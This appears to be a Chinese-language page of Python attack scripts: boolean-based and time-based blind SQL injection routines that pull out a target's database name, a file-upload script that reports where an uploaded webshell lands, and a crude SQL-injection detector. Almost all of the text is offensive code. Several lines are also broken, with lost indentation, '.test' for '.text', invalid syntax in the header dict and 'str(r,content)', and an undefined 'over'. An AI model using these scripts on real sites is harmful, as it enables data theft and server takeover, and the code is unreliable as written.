#布尔(先获取长度后获取名字)
import requests,string
url = "http://test.com"
#计算页面字节长度
htmllen = len(requests.get(url=url+"?id=1").test)
print("htmllen:"+str(htmllen))
dbnamelen = 0
while True:
dbnamelen_url = url + "?id=1'+and+length(database())="+str(dbnamelen)+"--+"
#比较poyload和正常页面字节长度
if len(requests.get(dbnamelen_url).text) == htmllen:
print("The len of dbname:"+str(dbnamelen))
break
#长度超过30报错
if dbnamelen ==50:
print("error")
break
dbnamelen +=1
#判断数据库
dbname=""
while True:
#1~8(前半部分判断数据库长度8)
for i in range(1,9):
for a in string.ascii_lowercase:
dbname_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
print(dbname_url)
if len(requests.get(dbname_url).text) == htmllen:
dbname += a
print(dbname)
break
#延时(先获取长度后获取名字)
import requests,string
url = "http://test.com"
def timeOut(url):
try:
res = requests.get(url,timeout=3)
return res.text
except Exception as e:
return "timeout"
dbnamelen = 0
while True:
dbnamelen +=1
dbnamelenurl = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
print(dbnamelenurl)
if "timeout" in timeOut(dbnamelenurl):
print(dbnamelen)
break
if dbnamelen ==50:
print("error")
break
dbname=""
for i in range(1,dbnamelen+1):
for char in string.ascii_lowercase:
dbnameurl = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)'--+"
print(dbnameurl)
if "timeout" in timeOut(dbnameurl):
dbname += char
print("dbname is"+dbname)
break
print(over)
文件上传
import requests,sys
url = sys.argv[1]
path = sys.argv[2]
posturl =url + "文件保存路径"
#举例<input type="file" name="filedata"> 其中filedata为表单名字
#举例<input type="submit" name="submit" value="submit">
upfile = {"filedata":open(path,"rb")}
res = requests.post(url = posturl,files=upfile)
print("shell path:"+url+res.text[4:]) #根据需求截断
import requests,re
header={
cookie=""
}
url=input("请输入你要验证的url:")
r =requests.get(url,headers=header)
res=str(r,content)
#根据页面返回中特定字符判断(这里举例syntax)
if re.search("syntax",res):
print("存在sql注入")
else:
print("不存在sql注入")
浙公网安备 33010602011771号